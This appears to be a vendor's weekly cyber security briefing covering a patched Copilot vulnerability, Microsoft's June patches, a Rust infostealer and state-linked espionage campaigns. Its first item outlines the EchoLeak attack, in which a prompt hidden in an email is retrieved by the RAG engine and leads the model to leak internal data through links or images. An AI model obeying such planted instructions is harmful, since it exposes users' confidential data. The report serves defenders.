Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Weekly Briefing, 7-13 June
EchoLeak discovered, a 0-click vulnerability in Microsoft 365 Copilot
Researchers at Aim Labs have discovered a new critical vulnerability, called EchoLeak (CVE-2025-32711, CVSSv3 9.3 according to Microsoft), affecting Microsoft 365 Copilot. This flaw, fixed by Microsoft in May 2025, allowed an attacker to exfiltrate sensitive data without user interaction. The technique involves sending an email with a hidden prompt injection, designed to look like a corporate message.
Subsequently, when the user performs a related query in Copilot, the email is retrieved and processed by the RAG engine, triggering the malicious command. This induces the model to insert internal data into links or images that, when loaded, leaks the information to an external server.
Although there is no indication of actual exploitation, EchoLeak marks the emergence of a new class of flaws, known as LLM Scope Violation, that expose the risks of deep AI integration in enterprise environments.
Microsoft fixes one critical 0-day and 65 additional vulnerabilities in June Patch Tuesday
Microsoft has released its June 2025 security bulletin, which fixes 66 flaws, including an actively exploited 0-day in WebDAV (CVE-2025-33053 CVSSv3 8.8) that allows remote code execution by tricking the user with a malicious URL. It also resolves another publicly disclosed vulnerability in the SMB client (CVE-2025-33073 CVSSv3 8.8) that allows elevation of privileges to SYSTEM without user interaction.
Of the total number of flaws, ten are considered critical (eight RCE, two elevation of privilege), while the remainder include information disclosure, denial of service, security bypass and impersonation flaws. In addition, multiple vulnerabilities were fixed in Office (Word, Excel, Outlook, PowerPoint, SharePoint) with CVSS scores between 8.4 and 8.8. Microsoft also released builds for Windows 10 and 11 with additional fixes, functional improvements and system restores.
Although no mass exploits have been reported, the presence of an active 0-day makes it urgent to apply these updates.
Myth Stealer: a rapidly evolving Rust-based infostealer
Researchers at Trellix identified Myth Stealer, an infostealer written in Rust and distributed through fraudulent gaming websites. This malware displays a fake window to appear legitimate while extracting credentials, cookies, and clipboard data. It employs evasion techniques such as string obfuscation using obfstr, system persistence, screenshot capture, sandbox environment checks, and in-memory execution via memexec. It targets Chromium- and Gecko-based browsers, as well as applications like Discord.
The malware is delivered through .exe, .rar, and .zip files, often disguised as games or related software. Its operators offer it via weekly or monthly subscriptions on Telegram, and it is frequently updated to avoid detection.
ConnectWise replaces ScreenConnect, ConnectWise Automate, and RMM certificates
ConnectWise has decided to replace the digital code signing certificates used to sign its ScreenConnect, ConnectWise Automate, and RMM tools, following a warning from a third-party researcher about possible misuse related to the installer's handling of configuration data, which could be exploited by an attacker with system-level access.
APT PurpleHaze and ShadowPad target cybersecurity vendors and global entities
SentinelOne reveals that between July 2024 and March 2025, Chinese groups with state nexus, including operators PurpleHaze and ShadowPad, have launched cyberespionage campaigns against more than 70 organizations, spanning government, financial, technology, research and media sectors, including security vendors such as SentinelOne itself.
One prominent target was a hardware logistics company supporting SentinelOne, while they also detected reconnaissance activities targeting servers accessible via the Internet. These intrusions employed backdoors such as GOREshell and ShadowPad, with relevant technical sophistication such as the use of ORB networks and ScatterBrain obfuscation malware.
In some cases, vulnerabilities such as CVE-2024-8963 and CVE-2024-8190 in Ivanti devices were exploited for initial access.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
